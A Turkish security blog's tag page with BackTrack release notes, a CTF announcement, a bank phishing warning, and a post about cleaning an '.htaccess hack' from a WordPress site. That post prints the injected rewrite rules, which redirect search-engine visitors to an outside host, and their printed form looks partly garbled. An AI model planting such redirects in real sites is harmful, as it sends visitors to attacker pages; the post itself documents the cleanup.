hacking olarak etiketli yazılar
Backtrack 5 Yayınlandı!
11 May
Güvenlik testleri için özel olarak üretilen Linux dağıtımı olan Backtrack’ın yeni sürümü dün itibari ile yayınlandı. BackTrack 5 olarak piyasaya çıkan sürümün Ekran görüntüleri aşağıda yer almakta.
Yeni sürümü indirmek için http://www.backtrack-linux.org/downloads/ linkini ziyaret etmeniz yeterli olacaktır.
“exgocgkctswo” .htaccess Hack ve Kurtulma Yolları
1 May
Evet bir kaç gündür bloguma ulaşmak isteyipte ulaşamayan arkadaşlar farketmiş olacaktır. İlk iki gün 503 hatası alınca server bazlı bir sorun olduğunu düşünerek hosting firmama ticket açtım ve bir süre cevap bekleyerek geçti ki gelen cevapta server konfigrasyonlarında bir sorunun olmadığı tema yada kurulu olan wordpress ile ilgili sorun olduğu konusunda bir geri dönüş olunca zamanın da darlığı ile öncelikle başladım ftp de dolaşmaya.
Birden farkettim ki abartısız her klasörün içinde var olan bir .htaccess dosyası var merak ettim ve içeriğine baktığımda da agent’ları hedef alan ve sonrasında siteyi yoran bir kod bloğuyla karşılaştım.
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http)([^].)(google.yahoo.bing.msn.yandex.ask.excite.altavista.netscape.aol.hotbot.goto.infoseek.mamma.alltheweb.lycos.search.metacrawler.rambler.mail.dogpile.ya.search).$ [NC]
RewriteCond %{HTTP_REFERER} !^.(q=cache).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(bingAccoonaAcesExplorerAmfibiAmigasOSapacheappieAppleSyndication).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ArchiveArgusAsksJeevesasteriasAtrenkosNewsBeOSBigBlogZoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(BookmarkbotCE-PreloadCFNetworkcococCombineCrawlcurlDangershiptop).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(DiagnosticsDTAAgentectoEmeraldShieldendoEvaalEverest-Vulcan).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(exactseekFeedFetchfindlinksFreeBSDFriendsterFucksYouGoogle).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(GregariusHatenaScreenshotheritrixHolyCowDudeHonda-SearchHP-UX).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurfLinuxLiveJournalLonoponoLotus-NotesLycosLynxMac_PowerPC).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Mac_PPCMacs10MacsOSmacDNMacintoshMediapartnersMegiteMetaProducts).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(os=MacP900ipanscientperlPlayStationPOE-ComponentPrivacyFinder).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeriess60).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SharpReaderSiteBarSlurpSnoopySoapsClientSocialmarksSpheresScout).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWins9x).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Win16Win95Win98Windowss95Windowss98WindowssCEWindowssNTs4).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(YandexYetiYouReadMeZhuaxiaZyBorg).$ [NC]
RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.)$ httptrialworld.netcgi-binr.cgip=10003&i=604add41&j=327&m=e8d794e1972216960f0b996ffedc1a32&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe1%{HTTP_HOST}100800HttpOnly]
# exgocgkctswo
Bu durumdan kurtulmak için öncelikle ftp’deki dosyalarımın tümünü bilgisayarıma indirdim. içinde yaklaşık 300′e yakın olan .htaccess dosyalarını temizledim bu arada bu noktada dikkat etmek gerekiyor .htaccess kullanan bir eklenti kullanıyor iseniz onuda silme ihtimalinize karşı öncelikle daha önce elinizde sağlam bir şekilde var olan bir yedeğinizin olması sizi olası sorunlardan koruyacaktır. Sonrasında ise wordpress’in kendi root dizinindeki .htaccess’de dahil olmak üzere tümünü kaldırdığınızdan emin iseniz FTP’deki dosyaları silerek bunları tekrar atmalısınız. Bu işlem bittiğinde aşağıdaki resimde de görüldüğü gibi sitenizi ilginç karakterlerle açılıyor görebilirsiniz. Endişelenmeyin.
Bu aşamada aklıma gelen ilk şey acaba wordpress’in dosyalarında da mı bir sıkıntı var diyerek temiz en son sürümü indirip dosyalarını tekrar ftp attım ama nafile. Birden Admin panelindeki Ayarlar menüsünde var olan “Kalıcı bağlantılar” ile .htaccess oluşturmak geldi aklımdan ve sorunda hallolmuş oldu böylece :) Bu arada Kalıcı bağlantılar menüsü altında ayarlarınızı resimdeki gibi yapmanız gerekmektedir.
Böylece bir kaç günlük aranın ardından daha sağlıklı bir şekilde kaldığımız yerden devam ediyoruz.
Backtrack 4 Final Yayınlandı!
12 Oca
Malumunuz Güvenlik testleri ve Hacking için özel olarak tasarlanan ve çeşitli toolları içerisinde varsayılan olarak bulunduran bir Linux dağıtımı olan Backtrack Son sürümü 4′ü yayınladı.
Ekran görüntüleri:
Download için: http://www.backtrack-linux.org/downloads/ adresini ziyaret edebilrsiniz.
“Beni hackleyebilir misin?”
19 Ara
Uzun zamandır takip ettiğim ve Türkiye’de Network ve Güvenlik konularında başarılarını örnek aldığım kişi olan Huzeyfe Onal ve ekibinin IstSec ile geçen hafta güzel bir konferansa imza attıklarını duyurmuştum. Bir önceki yazımda… Bu hafta’da IstSec’in ikinci gününde yer alan ve Huzeyfe Önal tarafından geliştirilen sistem üzerinde bir yarışma gerçekleştirildi ama biraz da gizli kalmak isteyen arkadaşların ön plana çıkmak istememelerinden olsa gerek ki yarışmada bunu başarabilen olmadı ve sonrasında da online olarak bunu başarılabileceğini düşünerek CTF’yi İnternet üzerinden yapılması kararını vermişler.
Yarışmayı Huzeyfe Hoca’nın bloğunda ki alıntı ile kendi kelimeleri vasıtasıyla tanıtımını yapmak istedim;
Hep tartışılmıştır Türkiye’de hackerların sayısı ve kalifiye oranı… 8-9 yıldır az çok bu işin içerisinde biri olarak pek kalifiye hackerimiz olmadığını düşünürüm(çok iyi olanlarin varlığını da biliyorum). Zira bizde hacking daha çok defacement, “kendi tabirleriyle index atma” üzerine kurulu. Güvenlik dünyasının önde gelen firmalarının hazırladığı siber tehdit raporlarında da bu düşünceme kanıt olacak sonuçlar var.
IstSec organizasyonlarında bu tip hacker arkadaşları CTF yarışmasına davet ettik ama hepsi bir şekilde uzaktan seyretmeyi seçti. Biz de madem kendinizi göstermek istemiyorsunuz size online bir yarışma açalım kendinizi gösterin dedik ve HackMe!yarışmasını açtık. Şimdilik sunucu kurulum işlemleriyle boğuşuyorum, çok yakın zamanda yine buradan ve çeşitli ortamlardan duyurusunu okuyacaksınız.
HackMe! yarışmasının amacı sistemler üzerinde alınan basit güvenlik önlemlerinin ne kadar hayat kurtarıcı olacağını ve yine sistemler üzerinde alınmayan basit güvenlik önlemlerinin nelere yolaçabileceğini göstermek. Yani ortada çeşitli güvenlik açıklıkları içeren bir/birkaç sistem var ve sizlerden bu açıklıkları bulup sistemi ele geçirmeniz isteniyor. Hediyesi ise gayet tatmin edici:) (bkz:IstSec CTF hediyesi). Sistem kesinlikle hacklenemez değil, sadece hackleme için biraz bilgi ve bu bilgiyi kullanabilecek tecrübe gerekiyor.
IstSec’de Akşam gazetesinden bir arkadaşla bu konuyu konuşmuştuk sağolsun o da duyurusunu yapmış (başlığa bakarak aldanmayın, klasik medya oyunu başlık, yoksa böyle birşey elbette denilmez:)
Bakalım bu şekilde başarabilecekler birileri çıkacak mı? Bunu zaman gösterecek.
Akbank’tan Phishing Uyarısı
17 Mar
Akbank’tan yapılan açıklamaya göre son günlerde Akbank ismi ve görseli kullanılarak dolandırıcılık (phishing) amaçlı mail yollanıldığı içeriğinde ise “Akbank Hesap Kartı Doğrulama” ya da “Bilgilerinizin yeni altyapımızda güncellenmesi için ‘Güncellemek için tıklayınız’ yazılı link aracılığıyla müşterilerin sahte Akbank web sitesine yönlendirilerek bu sayfada açılan ekran üzerinde de banka kartı numarası, son kullanma tarihi ve Akbank kart şifresinin istenmesi hakkında bilgi bulunmakta.
Akbank’ın kullancılarına yaptığı uyarıyla kullanıcılarının bu konuda dikkatli olmasını sağlamakta.
“Akbank hiç bir zaman size ‘Akbank Hesap Kartı Güvenlik Güncellemesi’ne ilişkin ya da başka bir konu nedeniyle, banka kartı numarasının, son kullanma tarihinin, şifresinin ya da size özel müşteri bilgilerinizin istendiği e-postalar göndermemektedir. Lütfen bu tür e-postalardaki linklere tıklamayınız ve linklerden internet şubelerimizi kesinlikle kullanmayınız. Bu e-postaları hemen siliniz. Böyle bir e-postayı açarak, e-postanın linkindeki sayfaya kişisel bilgilerinizi girdiyseniz, hemen 444 25 25 Akbank Telefon Şubesi’ni arayınız. İnternet şubelerimizi, mutlaka tarayıcınıza www.akbank.com yazarak ulaştığınız Akbank web sitesi üzerinden kullanınız.”
